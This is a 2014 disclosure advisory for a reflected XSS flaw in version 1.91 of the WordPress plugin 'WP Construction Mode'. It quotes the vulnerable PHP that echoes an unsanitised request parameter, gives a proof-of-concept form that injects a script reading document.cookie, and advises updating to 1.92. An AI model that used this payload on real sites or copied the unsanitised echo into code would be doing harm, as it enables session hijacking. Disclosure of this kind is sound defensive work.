WordPress WP Construction Mode 1.91 XSS

`Title: WordPress 'WP Construction Mode' plugin - XSS  
Version: 1.91  
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2014/12/12  
Download: https://wordpress.org/plugins/wp-construction-mode/  
Contacted vendor: 2014/10/20  
----------------------------------------------------------------  
  
## Plugin description:   
----------------------------------------------------------------  
Set entire website or specific page under construction or maintenance for all viewers except Admin  
  
  
## Reflected XSS:  
----------------------------------------------------------------  
the set_opt parameter is shown unsanitized to the admin user when saving, allowing the injection of arbitrary scripts and HTML.  
  
Vulnerable code:  
if (isset($_REQUEST['act'])) {  
switch ($_REQUEST['act']) {  
case "save":  
set_under_construction();  
echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: ' . ($_REQUEST['set_opt']) . '</p></div>';  
break;  
default:  
}  
}  
  
PoC:  
Log in as admin and submit the following form.  
  
<form method="POST" action="http://[HOST]/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data">  
<input type="text" name="set_opt" value="Yes<script>alert(document.cookie);</script>">  
<input type="text" name="set_page" value="all">  
<input type="text" name="act" value="save">  
<input type="submit">  
</form>  
  
## Solution  
----------------------------------------------------------------  
Update to version 1.92.  
`